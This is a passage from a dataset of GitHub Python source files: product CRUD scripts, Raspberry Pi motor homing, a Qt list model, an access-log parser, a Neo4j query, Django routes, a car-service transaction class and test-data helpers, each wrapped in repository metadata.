glfw.terminate()","repo_name":"vasMil/Multidimension-Data-Structures","sub_path":"LineSegmentIntersection/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"23073540203","text":"class Products:\n\n #method to initalize attributes\n def __init__(self, name, description, price, quantity, image):\n self.product_name = name\n self.product_description = description\n self.product_price = price\n self.product_quantity = quantity\n self.product_image = image\n \n\n #method to add products to the products list in the web app\n def add_product(self):\n product_dict = { #dictionary to represent attributes and their values \n \"name\": self.product_name,\n 
\"description\": self.product_description,\n \"price\": self.product_price,\n \"quantity\": self.product_quantity,\n \"image\": self.product_image\n }\n \n return product_dict\n\n\nproducts_list = [] #empty list to store all products\n\nnum_products = int(input(\"How many products do you want to add? \")) #prompt to enter no of produts to be added\n\n\n#loop to iterate over number of products to be added, and prompt user to enter details of each product\nfor i in range(num_products):\n name = input(f\"Enter the name of product {i+1}: \")\n description = input(f\"Enter the description of product {i+1}: \")\n price = float(input(f\"Enter the price of product {i+1}: \"))\n quantity = int(input(f\"Enter the quantity of product {i+1}: \"))\n image_url = input(f\"Enter the URL of product {i+1} image: \")\n \n product = Products(name, description, price, quantity, image_url) #object instantiation\n products_list.append(product) #adding new products to the all products list\n \n product_dict = product.add_product() #obtaining new products in dictionary structure\n print(product_dict)\n\n\n#method to edit existing products, takes wholeproduct list as a parameter\ndef edit_products(products_list):\n edit_product = input(\"Which product do you want to edit?:\") #prompt to enter product to be edited\n\n #looping through list of all products \n for product in products_list: \n if product.product_name == edit_product: #checking if the input product is in the list, if found, prompts to enter new details\n new_name = input(\"Enter the new name: \")\n new_description = input(\"Enter the new description: \")\n new_price = float(input(\"Enter the new price: \"))\n new_quantity = int(input(\"Enter the new quantity: \"))\n new_image_url = input(\"Enter the new image URL: \")\n \n #updating the product to match new values\n product.product_name = new_name\n product.product_description = new_description\n product.product_price = new_price\n product.product_quantity = new_quantity\n product.product_image = new_image_url\n \n return \"Product edited successfully.\"\n \n else: #if product not found\n print(\"Product not found.\")\n\nedit_products(products_list)\n\n#method to delete products from the product list, takes whole product list as a parameter\ndef delete_product(products_list):\n delete_product = input(\"Which product do you want to delete? 
\")\n\n #iterating through product list\n for product in products_list:\n if product.product_name == delete_product: #checking if the input product is in the list, if found, it is removed\n products_list.remove(product)\n return \"Product deleted successfully.\"\n \n else: #if product not found\n print(\"Product not found.\")\n \n\ndelete_product(products_list)","repo_name":"MariaGKimani/Backend-Mboga-Mtaani-","sub_path":"products.py","file_name":"products.py","file_ext":"py","file_size_in_byte":3575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"31459531813","text":"import RPi.GPIO as GPIO\nfrom time import sleep\nfrom Limit_Switches import limitSwitches\n\n\nls = limitSwitches()\n\n\ndef yHoming():\n\n GPIO.cleanup()\n\n DIR_1 = 19 # DIR+\n STEP_1 = 20 # PULL+\n\n # 0/1 used to signify clockwise or counterclockwise.\n CW = 0\n CCW = 1\n\n MAX = 10000\n\n motor1_flag = 0\n motor2_flag = 0\n\n GPIO.setmode(GPIO.BCM)\n motor1_switch = 18\n motor2_switch = 12\n GPIO.setup(motor1_switch, GPIO.IN, pull_up_down=GPIO.PUD_UP)\n GPIO.setup(motor2_switch, GPIO.IN, pull_up_down=GPIO.PUD_UP)\n\n # Establish Pins in software\n GPIO.setup(DIR_1, GPIO.OUT)\n GPIO.setup(STEP_1, GPIO.OUT)\n\n # Set the first direction\n GPIO.output(DIR_1, CCW)\n\n try:\n\n while 1:\n\n for x in range(MAX):\n\n GPIO.output(STEP_1, GPIO.HIGH)\n # Allow it to get there.\n # .5 == super slow\n sleep(0.005) # Dictates how fast stepper motor will run\n GPIO.output(STEP_1, GPIO.LOW)\n\n sleep(0.005)\n\n if GPIO.input(motor2_switch) == 0:\n motor2_flag += 1\n elif GPIO.input(motor1_switch) == 0:\n motor1_flag += 1\n else:\n motor2_flag = 0\n motor1_flag = 0\n\n if motor2_flag >= 5:\n print(\"Y Homing Complete\")\n sleep(1)\n return\n\n elif motor1_flag >= 5:\n print(\"Y Homing Complete\")\n sleep(1)\n return\n\n # Once finished clean everything up\n except KeyboardInterrupt:\n print(\"cleanup\")\n GPIO.cleanup()\n\n\ndef main():\n yHoming()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Bpatt9690/Exolith_Lab","sub_path":"Mark_IV/Motors/yhoming.py","file_name":"yhoming.py","file_ext":"py","file_size_in_byte":1777,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"7043644598","text":"from PySide6.QtCore import QAbstractListModel, Qt, QModelIndex, QFileInfo, Signal\nfrom PySide6.QtGui import QIcon, QPixmap\nfrom typing import List\nfrom pathlib import Path\n\nclass ListModel(QAbstractListModel):\n rowAdded = Signal()\n rowRemoved = Signal()\n def __init__(self, fileList, parent=None):\n QAbstractListModel.__init__(self, parent)\n self.metadataList: List[Path] = fileList\n\n def flags(self, index):\n defaultFlags = QAbstractListModel.flags(self,index)\n return Qt.ItemIsDropEnabled | defaultFlags\n\n def canDropMimeData(self, data, action, row, column, parent):\n return data.hasUrls()\n\n def dropMimeData(self, data, action, row, column, parent):\n for file in data.urls():\n #if file.isLocalDirectory():\n self.addRow(Path(file.toLocalFile()))\n return True\n\n\n def rowCount(self, parent=QModelIndex()):\n return len(self.metadataList)\n\n def columnCount(self, parent=QModelIndex()):\n return 1\n\n def data(self, index, role):\n if role == Qt.DisplayRole:\n if index.column() == 0:\n return self.metadataList[index.row()].name\n elif role == Qt.DecorationRole:\n file_path = self.metadataList[index.row()]\n if file_path.is_dir():\n return QIcon(QPixmap(':/resources/Images/folder@2x.png'))\n else:\n return 
QIcon(QPixmap(':/resources/Images/file@2x.png'))\n return None\n\n def setData(self,index, value, role):\n if role == Qt.EditRole:\n if not index.isValid():\n return False\n if index.column() == 0:\n self.dataChanged.emit(index, index)\n return index.row()\n\n def addRow(self, filename):\n self.beginInsertRows(self.index(len(self.metadataList),0), len(self.metadataList),len(self.metadataList))\n self.metadataList.append(filename)\n self.endInsertRows()\n self.rowAdded.emit()\n\n def removeRow(self, rowIndex):\n self.beginRemoveRows(QModelIndex(),rowIndex, rowIndex)\n del self.metadataList[rowIndex]\n self.endRemoveRows()\n self.rowRemoved.emit()\n\n def removeAllRows(self):\n newI = 0\n for i in range(len(self.metadataList)):\n self.removeRow(i-newI)\n newI+=1\n\n\n\n","repo_name":"BlueQuartzSoftware/MetaForge","sub_path":"metaforge/models/uselistmodel.py","file_name":"uselistmodel.py","file_ext":"py","file_size_in_byte":2345,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"24600072256","text":"\"\"\" Parsing module \"\"\"\nfrom datetime import datetime, timedelta, tzinfo\nfrom time import strptime\nimport re\n\nfrom access_log_analyzer import (\n TIMESTAMP_PATTERN, LOG_PATTERN,\n TIMESTAMP_GROUP, REQUEST_GROUP, REQUEST_PATTERN,\n WHITELIST_PATTERNS, BLACKLIST_PATTERNS, RESOURCE_GROUP\n)\n\nclass Timezone(tzinfo):\n \"\"\" Timezone class \"\"\"\n def __init__(self, name=\"+0000\"):\n self.name = name\n seconds = int(name[:-2])*3600 + int(name[-2:])*60\n self.offset = timedelta(seconds=seconds)\n\n def utcoffset(self, dt):\n return self.offset\n\n def dst(self, dt):\n return timedelta(0)\n\n def tzname(self, dt):\n return self.name\n\ndef process_request_time(request_time):\n \"\"\" Process request time \"\"\"\n date_time = strptime(request_time[:-6], TIMESTAMP_PATTERN)\n time_zone = Timezone(request_time[-5:])\n\n time_info = list(date_time[:6]) + [0, None]\n\n date = datetime(*time_info)\n\n return date - timedelta(seconds=time_zone.offset.seconds)\n\ndef parse_log_line(line):\n \"\"\" Parse access log line \"\"\"\n groups = re.match(LOG_PATTERN, line).groups()\n\n timestamp = groups[TIMESTAMP_GROUP]\n request = groups[REQUEST_GROUP]\n\n whitelisted = False\n for pattern in WHITELIST_PATTERNS:\n if re.match(pattern, request):\n whitelisted = True\n break\n\n if not whitelisted:\n for pattern in BLACKLIST_PATTERNS:\n if re.match(pattern, request):\n return [None, None]\n\n groups = re.match(REQUEST_PATTERN, request).groups()\n\n content = groups[RESOURCE_GROUP]\n timestamp = process_request_time(timestamp)\n\n str_y = timestamp.strftime('%Y') # YYYY\n str_ym = timestamp.strftime('%Y%m') # YYYYMM\n str_yw = '%sW%s' % (str_y, '{:02d}'.format(timestamp.isocalendar()[1])) # YYYYWWW\n str_ymd = timestamp.strftime('%Y%m%d') # YYYYMMDD\n str_ymdh = timestamp.strftime('%Y%m%d%H') #YYYYMMDDHH\n\n return [content, [str_y, str_ym, str_yw, str_ymd, str_ymdh]]\n","repo_name":"kldavis4/access_log_analyzer","sub_path":"lib/access_log_analyzer/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":1992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"40542236111","text":"#!/usr/bin/env python3\nimport jutil as ju\nimport matplotlib\nmatplotlib.use('TkAgg')\nimport matplotlib.pyplot as plt\nimport numpy as np\nplt.ion()\n\n\n#x=np.linspace(-1, 1, num=1e5, endpoint=True, dtype=np.float)\n#N1=1\n#N2=150\n#fg, 
((ax1))=plt.subplots(nrows=1,ncols=1)\n#NN=range(N1,1+N2)\n#rg=np.ndarray(N2-N1+1,dtype=np.float)\n#for n in range(N1,1+N2): f,F,df,rg[n-N1]=ju.zero_gradf(x,n)\n#ax1.plot(NN,rg)\n#\n#\n#plt.draw()\n#plt.waitforbuttonpress()\n\n \nx=np.linspace(-2, 2, num=1e4, endpoint=True, dtype=np.float) \nN1=5\nN2=5\nfor n in range(N1,1+N2):\n fg, ((ax1,ax4),(ax2,ax5),(ax3,ax6))=plt.subplots(nrows=3,ncols=2)\n f,F,df=ju.zero_gradf(x,n)\n d=1e-5;\n f1,F1,df1=ju.zero_gradf(x+2*d,n)\n f2,F2,df2=ju.zero_gradf(x+1*d,n)\n f3,F3,df3=ju.zero_gradf(x-1*d,n)\n f4,F4,df4=ju.zero_gradf(x-2*d,n)\n e1=f -(-F1+8*F2-8*F3+F4)/(12*d)\n e2=df-(-f1+8*f2-8*f3+f4)/(12*d)\n ax1.plot(x,df)\n ax2.plot(x,f)\n ax3.plot(x,F)\n ax4.plot(x,e2)\n ax5.plot(x,e1)\n\n\nplt.draw()\nplt.waitforbuttonpress()\n\n","repo_name":"jnm11/ded-buoyancy","sub_path":"test_zero_gradf.py","file_name":"test_zero_gradf.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"16238183043","text":"import py2neo\r\nfrom datetime import datetime\r\n\r\ndef code():\r\n graph = py2neo.Graph('http://10.176.38.226:7474', username='neo4j', password='abc123')\r\n cypher = \"match p=(n)-[*1..1]-() where id(n)=%s with extract(x in nodes(p) | x) as ns, extract(x in relationships(p) | {start: id(startnode(x)), end: id(endnode(x)), rel: type(x), id: id(x), properties: properties(x)}) as rs, n unwind ns as na unwind rs as ra return collect(DISTINCT na),collect(DISTINCT ra), n\" % (1165702)\r\n # print(cypher)\r\n data = graph.run(cypher).data()\r\n nodes = []\r\n for node in data[0][\"collect(DISTINCT na)\"]:\r\n label = list(node.labels)[0]\r\n node_id = node.identity\r\n complete_node = {\r\n \"labels\": [label],\r\n \"id\": node_id,\r\n \"properties\": dict(node.items()),\r\n \"showName\": node[\"name\"],\r\n }\r\n nodes.append(complete_node)\r\n relationships = []\r\n for rel in data[0][\"collect(DISTINCT ra)\"]:\r\n complete_rel = {\r\n \"startNode\": rel[\"start\"],\r\n \"endNode\": rel[\"end\"],\r\n \"source\": rel[\"start\"],\r\n \"target\": rel[\"end\"],\r\n \"id\": rel[\"id\"],\r\n \"type\": rel[\"rel\"],\r\n \"properties\": rel[\"properties\"],\r\n \"linknum\": \"1\"\r\n }\r\n relationships.append(complete_rel)\r\n ret = {\r\n \"center_id\": data[0][\"n\"].identity,\r\n \"nodes\": nodes,\r\n \"relationships\": relationships\r\n }\r\n print(ret)\r\n\r\n\r\nif __name__ == '__main__':\r\n print(datetime.now())\r\n","repo_name":"super100pig/YelpProject","sub_path":"backend/backend/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"3394393373","text":"import argparse\nimport subprocess\nfrom distutils.util import strtobool\nfrom multiprocessing import Pool\n\nimport pai.pouw.nodes.decentralized.worker\n\n\ndef main():\n # Parse CLI arguments\n parser = argparse.ArgumentParser(description='Starting up POUW cluster')\n parser.add_argument('--cuda', action='store_true', default=False,\n help='Train on GPU with CUDA')\n parser.add_argument('--nodes-number', type=int, default=3,\n help='number of nodes in cluster')\n parser.add_argument('--debug', type=strtobool, default=False,\n help='provide more verbose logging messages')\n parser.add_argument('--redis-host', type=str, default='localhost',\n help='redis host address used for worker synchronization')\n parser.add_argument('--redis-port', type=int, default=6379,\n help='Redis port used for 
connecting to redis database')\n parser.add_argument('--use-paicoin', type=strtobool, default=True,\n help='enable/disable usage of paicoin for testing and debugging purposes')\n\n args = parser.parse_args()\n\n worker_args = [(args.debug, args.cuda, args.use_paicoin,\n args.redis_host, args.redis_port)\n for _ in range(args.nodes_number)]\n\n pool = Pool(processes=args.nodes_number)\n pool.map(call_wrapper, worker_args)\n\n\ndef call_wrapper(args):\n return call_worker(*args)\n\n\ndef call_worker(is_debug=False, cuda=False, use_paicoin=True, redis_host='localhost', redis_port=6379):\n worker_script_path = pai.pouw.nodes.decentralized.worker.__file__\n # in order to ensure debugger is working properly\n if worker_script_path.endswith('pyc'):\n worker_script_path = worker_script_path[:-1]\n\n script_parameters = ['python3', worker_script_path,\n '--redis-host', redis_host,\n '--redis-port', str(redis_port),\n '--use-paicoin', str(use_paicoin),\n '--cuda', str(cuda),\n ]\n if is_debug:\n script_parameters.append('--debug')\n script_parameters.append('True')\n\n subprocess.call(\n script_parameters\n )\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"skaisahni/tps-optimization-on-blockchain-using-artificial-intelligence","sub_path":"pai/pouw/start_cluster.py","file_name":"start_cluster.py","file_ext":"py","file_size_in_byte":2284,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"43682480248","text":"# -*- coding: utf-8 -*-\n# ==========================================\n# @Time : 2018/3/26 下午9:39\n# @Author : Mr.Robot\n# @File : urls.py\n# ==========================================\nfrom django.urls import re_path\nfrom orgnization.views import OrgView, OrgHomeView, OrgCourseView, OrgDescView, OrgTeacherView, AddFavView\n\nurlpatterns = [\n # 课程机构列表页\n re_path(r'^list/$', OrgView.as_view(), name=\"org_list\"),\n # re_path(r'^add_ask/$', AddUserAskView.as_view(), name=\"add_ask\"),\n re_path(r'^home/(?P\\d+)/$', OrgHomeView.as_view(), name=\"org_home\"),\n re_path(r'^course/(?P\\d+)/$', OrgCourseView.as_view(), name=\"org_course\"),\n re_path(r'^desc/(?P\\d+)/$', OrgDescView.as_view(), name=\"org_desc\"),\n re_path(r'^teacher/(?P\\d+)/$', OrgTeacherView.as_view(), name=\"org_teacher\"),\n\n # 机构收藏\n re_path(r'^add_fav/$', AddFavView.as_view(), name=\"add_fav\"),\n]\n\napp_name = 'org'\n","repo_name":"My-captain/iMooc","sub_path":"apps/orgnization/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"36031732973","text":"import os\nfrom unittest import TestCase\nimport datetime\nfrom forex import convert\n\nfrom models import db, User, Client, Project, LogEntry\n\nos.environ['DATABASE_URL'] = \"postgresql:///work_logger\"\n\nfrom app import app\n\ndb.create_all()\n\n\nclass LogEntryModelTestCase(TestCase):\n \"\"\"Test views for log entry.\"\"\"\n\n def setUp(self):\n \"\"\"Create test client, add sample data.\"\"\"\n\n db.drop_all()\n db.create_all()\n\n u1 = User.register(\"testuser\", \"testpassword\", \"test@email.com\", \"John\", \"Doe\")\n u1_id = 1111\n u1.id = u1_id\n\n db.session.add(u1)\n db.session.commit()\n\n c1 = Client(user_id=1111, name='Organisation', street='Street 10', postcode='EH2 3XI', country='United Kingdom', city='Edinburgh')\n c1_id = 2222\n c1.id = c1_id\n\n db.session.add(c1)\n db.session.commit()\n\n p1 = Project(user_id=u1_id, project_name='Administration', hourly_rate=100, 
curr_of_rate='USD', curr_of_inv='EUR', client_id=c1_id)\n p1_id = 3333\n p1.id = p1_id\n\n db.session.add(p1)\n db.session.commit()\n\n le1 = LogEntry(project_id=p1_id, start_time=datetime.datetime(2020, 12, 16, 17, 00, 00), stop_time=datetime.datetime(2020, 12, 16, 18, 00, 00), description='Admin')\n le1_id = 4444 \n le1.id = le1_id\n\n db.session.add(le1)\n db.session.commit()\n\n u1 = User.query.get(u1_id)\n c1 = Client.query.get(c1_id)\n p1 = Project.query.get(p1_id)\n le1 = LogEntry.query.get(le1_id)\n\n self.u1 = u1\n self.u1_id = u1_id\n self.c1 = c1 \n self.c1_id = c1_id\n self.p1 = p1 \n self.p1_id = p1_id\n self.le1 = le1 \n self.le1_id = le1_id\n\n self.client = app.test_client()\n\n def tearDown(self):\n res = super().tearDown()\n db.session.rollback()\n return res\n\n def test_invoice_model(self):\n \"\"\"Does basic model work?\"\"\"\n\n self.assertEqual(self.le1.project_id, self.p1_id)\n\n#######################test log entry methods\n\n def test_pretty_start_time(self): \n \"\"\"does le return pretty start time?\"\"\"\n\n self.assertEqual(self.le1.pretty_start_time, \"17:00\")\n\n def test_pretty_stop_time(self): \n \"\"\"does le return pretty stop time?\"\"\"\n\n self.assertEqual(self.le1.pretty_stop_time, \"18:00\")\n\n def test_pretty_date(self): \n \"\"\"does le return pretty date?\"\"\"\n\n self.assertEqual(self.le1.pretty_date, \"2020-12-16\")\n\n def test_time_delta(self): \n \"\"\"does le return correct time difference?\"\"\"\n\n self.assertEqual(self.le1.time_delta, 60)\n\n def test_calc_value(self): \n \"\"\"does le calculate correct values?\"\"\"\n\n value_inv = round(convert(self.p1.curr_of_rate, self.p1.curr_of_inv, 100), 2)\n\n self.assertEqual(self.le1.calc_value(), {\n \"value_rate\": \n {\"sum\": 100, \"symbol\": \"US$\"}, \n \"value_inv\": \n {\"sum\": value_inv, \"symbol\": \"€\"}\n })\n\n self.assertEqual(self.le1.value_in_curr_of_inv, value_inv)\n self.assertEqual(self.le1.value_in_curr_of_rate, 100)\n\n def test_handle_edit(self): \n \"\"\"does le update correctly?\"\"\"\n\n self.le1.calc_value()\n self.p1.increment_subtotal(self.le1.value_in_curr_of_rate)\n self.p1.increment_converted_subtotal(self.le1.value_in_curr_of_inv)\n\n data = {'description': 'Edited description', \n 'start_time': '17:00', \n 'stop_time': '19:00', \n 'date': '2020-12-01'}\n\n self.le1.handle_edit(data)\n\n self.assertEqual(self.le1.description, 'Edited description')\n self.assertEqual(self.le1.date, datetime.date(2020, 12, 1))\n self.assertEqual(self.le1.start_time, datetime.datetime(2020, 12, 1, 17, 0, 0))\n self.assertEqual(self.le1.stop_time, datetime.datetime(2020, 12, 1, 19, 0, 0))\n\n\n\n\n\n\n\n\n","repo_name":"sanspanic/Track","sub_path":"tests/models/test_log_entry_model.py","file_name":"test_log_entry_model.py","file_ext":"py","file_size_in_byte":3923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"30606016261","text":"# 숫자 입력 함수\ndef inputNumber(prompt):\n # 입력 변수\n inp = \"\"\n # 변수가 유효한 숫자일 때까지 반복하기\n while not inp.isnumeric():\n # 입력 프롬프트\n inp = input(prompt).strip()\n # 숫자 반환하기\n return int(inp)\n\n# 숫자 가져오기\nnum = inputNumber(\"숫자 입력: \")\n# 출력하기\nprint(num)","repo_name":"yonghun16/Study","sub_path":"BackEnd/do_it_game_python/11/Func4.py","file_name":"Func4.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"28923085171","text":"from Domain.tranzactie import Tranzactie\nfrom 
Repository.file_repository import FileRepository\nfrom ViewModels.tranzactie_view_models import TranzactieViewModel\n\n\nclass TranzactieService:\n def __init__(self, tranzactii_repository: FileRepository, masini_repository: FileRepository, clienti_repository: FileRepository):\n self.__tranzactii_repository = tranzactii_repository\n self.__masini_repository = masini_repository\n self.__clienti_repository = clienti_repository\n\n def get_all(self):\n view_models = []\n for tranzactie in self.__tranzactii_repository.get_all():\n masina = self.__masini_repository.get_by_id(tranzactie.id_masina)\n client = self.__clienti_repository.get_by_id(tranzactie.id_card_client)\n view_models.append(TranzactieViewModel(tranzactie.id_entitate, masina, client, tranzactie.suma_piese, tranzactie.suma_manopera, tranzactie.data, tranzactie.ora))\n\n return view_models\n\n def adaugare(self, id_tranzactie, id_masina, id_card_client, suma_piese, suma_manopera, data, ora):\n tranzactie = Tranzactie(id_tranzactie, id_masina, id_card_client, suma_piese, suma_manopera, data, ora)\n\n if self.__masini_repository.get_by_id(id_masina) is None:\n raise KeyError('Nu se poate realiza tranzactia pentru ca nu exista o masina cu id-ul ', id_masina)\n if self.__clienti_repository.get_by_id(id_card_client) is None:\n raise KeyError('Nu se poate realiza tranzactia pentru ca nu exista un client cu id-ul ', id_card_client)\n if self.__clienti_repository.get_by_id(id_card_client) is not None:\n tranzactie.suma_manopera_noua = tranzactie.suma_manopera - tranzactie.suma_manopera//10\n\n self.__tranzactii_repository.adaugare(tranzactie)\n\n def stergere(self, id_card_client):\n self.__tranzactii_repository.stergere(id_card_client)\n\n def modificare(self, id_tranzactie, id_masina, id_card_client, suma_piese, suma_manopera, data, ora):\n tranzactie = self.__tranzactii_repository.get_by_id(id_tranzactie)\n if tranzactie is None:\n raise KeyError(f\"Nu exista nicio tranzactie cu id-ul {id_tranzactie}\")\n\n if id_masina != '':\n if self.__masini_repository.get_by_id(id_masina) is None:\n raise KeyError('Nu se poate crea comanda, pt. 
ca nu exista o masina cu id-ul ', id_masina)\n tranzactie.id_masina = id_masina\n if id_card_client != '':\n if self.__clienti_repository.get_by_id(id_card_client) is None:\n raise KeyError('Nu se poate realiza tranzactie pentru ca nu exista un client cu id-ul ', id_card_client)\n tranzactie.id_client = id_card_client\n if suma_piese != '':\n tranzactie.suma_piese = suma_piese\n if suma_manopera != 0:\n tranzactie.suma_manopera = suma_manopera\n if id_card_client != '':\n tranzactie.suma_manopera_noua = tranzactie.suma_manopera - tranzactie.suma_manopera // 10\n if data != 0:\n tranzactie.data = data\n if ora != '':\n tranzactie.ora = ora\n\n self.__tranzactii_repository.modificare(tranzactie)\n\n def merge(self, array, left_index, right_index, middle, comparison_function):\n left_copy = array[left_index:middle + 1]\n right_copy = array[middle + 1:right_index + 1]\n left_copy_index = 0\n right_copy_index = 0\n sorted_index = left_index\n\n while left_copy_index < len(left_copy) and right_copy_index < len(right_copy):\n if comparison_function(left_copy[left_copy_index], right_copy[right_copy_index]):\n array[sorted_index] = left_copy[left_copy_index]\n left_copy_index = left_copy_index + 1\n else:\n array[sorted_index] = right_copy[right_copy_index]\n right_copy_index = right_copy_index + 1\n\n sorted_index = sorted_index + 1\n\n while left_copy_index < len(left_copy):\n array[sorted_index] = left_copy[left_copy_index]\n left_copy_index = left_copy_index + 1\n sorted_index = sorted_index + 1\n\n while right_copy_index < len(right_copy):\n array[sorted_index] = right_copy[right_copy_index]\n right_copy_index = right_copy_index + 1\n sorted_index = sorted_index + 1\n\n def merge_sort(self, array, left_index, right_index, comparison_function):\n if left_index >= right_index:\n return\n\n middle = (left_index + right_index) // 2\n self.merge_sort(array, left_index, middle, comparison_function)\n self.merge_sort(array, middle + 1, right_index, comparison_function)\n self.merge(array, left_index, right_index, middle, comparison_function)\n","repo_name":"simonadaariana/lab-AlgorithmsAndProgramming","sub_path":"Service/tranzactie_service.py","file_name":"tranzactie_service.py","file_ext":"py","file_size_in_byte":4790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"7419405312","text":"from django.urls import path\nfrom django.conf import settings\nfrom django.conf.urls.static import static\nfrom . 
import views\n\nurlpatterns = [\n path('', views.index, name='index'),\n path('about', views.about, name='about'),\n path('courses', views.courses, name='courses'),\n path('courses/', views.course_detail, name='course_detail'),\n path('courses//add_video', views.add_video, name='add_video'),\n path('courses//edit_course', views.edit_course, name='edit_course'),\n path('courses/create', views.course_create, name='course_create'),\n path('profile/', views.profile, name='profile'),\n path('user_login', views.user_login, name='user_login'),\n path('logout', views.user_logout, name='logout'),\n path('special', views.special, name='special'),\n path('charge/', views.checkout, name='charge')\n]\n\nif settings.DEBUG:\n urlpatterns += static(\n settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n\n\n","repo_name":"krdowns/learnify","sub_path":"learnify/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"74379373842","text":"from typing import List\n\n\ndef jump_game_2(nums: List[int]) -> int:\n \"\"\"\n You are given a 0-indexed array of integers nums of length n. You are initially positioned at nums[0].\n\n Each element nums[i] represents the maximum length of a forward jump from index i.\n In other words, if you are at nums[i], you can jump to any nums[i + j] where:\n\n 0 <= j <= nums[i] and\n i + j < n\n\n Return the minimum number of jumps to reach nums[n - 1].\n The test cases are generated such that you can reach nums[n - 1].\n\n Args:\n nums: 0-indexed array of integers of length n\n\n Returns:\n the minimum number of jumps to reach nums[n-1]\n \"\"\"\n jumps, left, right = 0, 0, 0\n\n while right < len(nums) - 1:\n window_end = 0\n for idx in range(left, right + 1):\n window_end = max(window_end, idx + nums[idx])\n left = right + 1\n right = window_end\n jumps += 1\n\n return jumps\n\n\nif __name__ == \"__main__\":\n print(jump_game_2([2, 3, 1, 1, 4]))\n print(jump_game_2([2, 3, 0, 1, 4]))\n","repo_name":"BhupiSindhwani/python-problem-solving","sub_path":"greedy/jump_game_2.py","file_name":"jump_game_2.py","file_ext":"py","file_size_in_byte":1064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"19039218171","text":"# -*- coding: utf-8 -*-\n\"\"\" helper functions \"\"\"\nimport logging\n# pylint: disable=E0401, C0413\nimport sys\nimport calendar\nimport pathlib\nimport json\nimport configparser\nfrom datetime import datetime, date\nimport math\nimport numpy as np\nfrom dateutil.parser import parse\nimport pytz\nimport os\nimport random\n\nsys.path.insert(0, '.')\nsys.path.insert(1, '..')\n\n\ndef age_calculate(birthdate):\n \"\"\" calculate age \"\"\"\n today = date.today()\n age = today.year - birthdate.year - ((today.month, today.day) < (birthdate.month, birthdate.day))\n return age\n\ndef config_load(logger=None, mfilter=None, cfg_file='hockeygraphs.cfg'):\n \"\"\" small configparser wrappter to load a config file \"\"\"\n if logger:\n logger.debug('config_load({1}:{0})'.format(mfilter, cfg_file))\n config = configparser.RawConfigParser()\n config.optionxform = str\n config.read(cfg_file)\n return config\n\ndef json_load(file_name):\n \"\"\" load json structure from file \"\"\"\n with open(file_name, encoding='utf8') as json_file:\n data = json.load(json_file)\n return data\n\ndef json_store(file_name_, data_):\n \"\"\" store structure as json to file \"\"\"\n with open(file_name_, 'w', 
encoding='utf-8') as out_file:\n json.dump(data_, out_file, ensure_ascii=False, indent=4)\n\ndef url_build(environ, include_path=False):\n \"\"\" get url \"\"\"\n if 'HTTP_HOST' in environ:\n server_name = environ['HTTP_HOST']\n else:\n server_name = 'localhost'\n\n if 'SERVER_PORT' in environ:\n port = environ['SERVER_PORT']\n else:\n port = 80\n\n if 'HTTP_X_FORWARDED_PROTO' in environ:\n proto = environ['HTTP_X_FORWARDED_PROTO']\n elif 'wsgi.url_scheme' in environ:\n proto = environ['wsgi.url_scheme']\n elif port == 443:\n proto = 'https'\n else:\n proto = 'http'\n\n if include_path and 'PATH_INFO' in environ:\n result = '{0}://{1}{2}'.format(proto, server_name, environ['PATH_INFO'])\n else:\n result = '{0}://{1}'.format(proto, server_name)\n return result\n\ndef testdata_load(_debug=False):\n \"\"\" load testdata for unittests \"\"\"\n # pylint: disable=C0415\n from rest.models import Match, Player, Periodevent, Shift, Season, Shot, Team\n Season.objects.create(name=\"Season-1\")\n Season.objects.create(name=\"Season-2\")\n Team.objects.create(team_id=1, team_name=\"Team-1\", shortcut=\"T1\")\n Team.objects.create(team_id=2, team_name=\"Team-2\", shortcut=\"T2\")\n Match.objects.create(match_id=1, season_id=1, date=\"2020-12-01\", date_uts=1606807800, home_team_id=1, visitor_team_id=2, result='2:1')\n Match.objects.create(match_id=2, season_id=1, date=\"2020-12-02\", date_uts=1606894200, home_team_id=2, visitor_team_id=1, result='1:2')\n Player.objects.create(player_id=1, first_name=\"first_name_1\", last_name=\"last_name_1\", jersey=1)\n Player.objects.create(player_id=2, first_name=\"first_name_2\", last_name=\"last_name_2\", jersey=2)\n Periodevent.objects.create(match_id=1, period_event={'foo': 'bar1'})\n Periodevent.objects.create(match_id=2, period_event={'foo': 'bar2'})\n Shift.objects.create(match_id=1, shift={'foo': 'bar1'})\n Shift.objects.create(match_id=2, shift={'foo': 'bar2'})\n Shot.objects.create(shot_id=11, player_id=1, team_id=1, match_id=1, match_shot_resutl_id=1, timestamp=11, coordinate_x=11, coordinate_y=11, real_date='real_date_11', polygon='polygon_11', zone='zone_11')\n Shot.objects.create(shot_id=12, player_id=1, team_id=1, match_id=1, 